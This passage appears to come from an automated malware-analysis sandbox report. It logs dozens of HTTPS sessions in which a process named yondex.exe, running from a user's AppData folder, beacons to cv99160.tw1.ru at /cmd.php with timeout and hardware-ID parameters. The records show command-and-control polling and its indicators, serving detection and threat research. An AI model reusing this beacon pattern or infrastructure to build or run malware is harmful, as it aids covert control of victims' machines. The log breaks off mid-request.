                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              40192.168.2.44978192.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:13 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:14 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:14 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=97d1560391a7caf21e52ab3ee91e5247; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:14 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              41192.168.2.44978292.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:15 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:15 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=03e79e112c0df97fd0b54b8952794ab5; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              42192.168.2.44978392.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:16 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:16 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=5668431d74929336dd70898f05b1280e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:16 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              43192.168.2.44978492.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:17 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:17 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:17 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=052e76cf5d7e5eb090a4c29a2f4f1749; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              44192.168.2.44978592.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:18 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:18 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=70ca4ee15ba348f3c98f944b670b969a; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:18 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              45192.168.2.44978692.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:20 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:20 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:20 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=bfad6550a5b508598d0f3209998a4a35; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              46192.168.2.44978792.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:21 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:21 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:21 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=25e1ba12b2bed88b1144215eaedc86f9; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:21 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              47192.168.2.44978892.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:22 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:22 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:22 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=ec352d113a23119642ce53e40060507d; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              48192.168.2.44978992.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:23 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:23 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:23 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=7956af7202a59c64a63cd396514907ed; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:23 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              49192.168.2.44979092.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:24 UTC148OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:25 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:25 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=fe1ea6978ea228e6dbaf79ae3941647a; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              50192.168.2.44979192.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:25 UTC148OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:26 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:26 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=46a1afa8dae829b24fa2999e01ea93c2; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              51192.168.2.44979292.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:27 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:27 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:27 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=2d0f1106b6ca1d93a95529839b44f669; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:27 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              52192.168.2.44979392.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:28 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:28 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:28 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=c9baf6a40e24db881454ff78df6c891a; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              53192.168.2.44979492.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:29 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:29 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:29 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=3c9eac9dee9d1cbbbb42acb9e3f341f0; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:29 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              54192.168.2.44979592.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:30 UTC148OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:31 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:31 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=fd0ed3b81222f557b87f597943955cad; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              55192.168.2.44979692.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:31 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:32 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:32 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=31339c10b648383af7311c59deb9a0f0; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              56192.168.2.44979892.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:32 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:33 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:33 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=cf8033872ee23fcfea6f23485b5b62cf; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:33 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              57192.168.2.44979992.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:34 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:35 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:34 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=243316787c73f34e7d7462cf332a0468; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              58192.168.2.44980092.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:36 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:37 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:37 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=b741f52c604f89f8a0e2aa8983a56ed9; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              59192.168.2.44980192.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:37 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:38 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:38 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=3fd7baf7c0efb5d81c715cd642575a03; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:38 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              60192.168.2.44980292.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:41 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:41 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=0de7b4e74749477eaef1ae868d5d8c41; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              61192.168.2.44980392.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:42 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:42 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:42 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=e7e79891e207391a9a8386f06d0d1fc8; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:42 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              62192.168.2.44980492.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:44 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:44 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=0c1417d1fc22758d1a6f818c191f40b2; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              63192.168.2.44980592.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:45 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:45 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:45 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=2d7bc5049b7380bd87fda3310ad99abd; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:45 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              64192.168.2.44980692.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:46 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:46 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:46 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=8ceb206dc75dc8baca88513de103bf34; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              65192.168.2.44980792.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:47 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:48 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:47 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=24e4fde91affe7518ae9593da1d14ba6; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:48 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              66192.168.2.44980892.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:50 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:51 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=8ab58a6e96d5060c1f88e1760283e456; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              67192.168.2.44980992.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:52 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
